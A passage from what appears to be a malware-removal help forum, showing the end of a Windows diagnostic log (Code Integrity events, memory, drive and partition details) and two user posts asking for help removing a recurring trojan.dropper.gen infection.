image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 21:41:31.323 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 21:31:57.630 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 19:53:29.363 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 18:55:19.639 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:37:01.322 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:22:56.207 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core i5 CPU 750 @ 2.67GHzPercentage of memory in use: 43%Total physical RAM: 4031.29 MBAvailable physical RAM: 2292.86 MBTotal Pagefile: 8060.76 MBAvailable Pagefile: 5054.2 MBTotal Virtual: 8192 MBAvailable Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (Hard Drive) (Fixed) (Total:289.83 GB) (Free:29.36 GB) NTFSDrive d: (HP_RECOVERY) (Fixed) (Total:6.25 GB) (Free:0.77 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive f: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive g: () (Fixed) (Total:232.68 GB) (Free:9.99 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6233878F)Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)Partition 2: (Not Active) - (Size=289.8 GB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=6.2 GB) - (Type=07 NTFS) ========================================================Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.8 GB) (Disk ID: 08000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=232.7 GB) - (Type=07 NTFS) ==================== End Of Log ============================
  24. Hi, Thank you in advance for helping out. It looks like many other users on the front page are currently experiencing the same problem. So, about a week and a half ago, my laptop was running extraordinarily slow, and overheating. I noticed a bunch of dllhost.exe*32 processes running in the background, that just kept popping up everytime I shut down the process. A couple days later, my anti-virus software kept detecting and removing a trojan.dropper.gen infection that keeps coming up. I'm not sure whether these two are related. A quick search on google tells me that this malware might be a hell of a lot more dangerous than it appears. Please help me remove all the instances of this malware from my computer. It seems to be slipping through the antivirus / antimalware. Thank you in advance!!!
  25. Greetings, all! I ran into the same virus that a lot of people on this forum are coming in contact with... Please advise the best starting point to get rid of this awful thing? I have attempted to mirror the efforts by others on this site and had some success but now it is back with a vengeance. Please advise - Thank you!
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.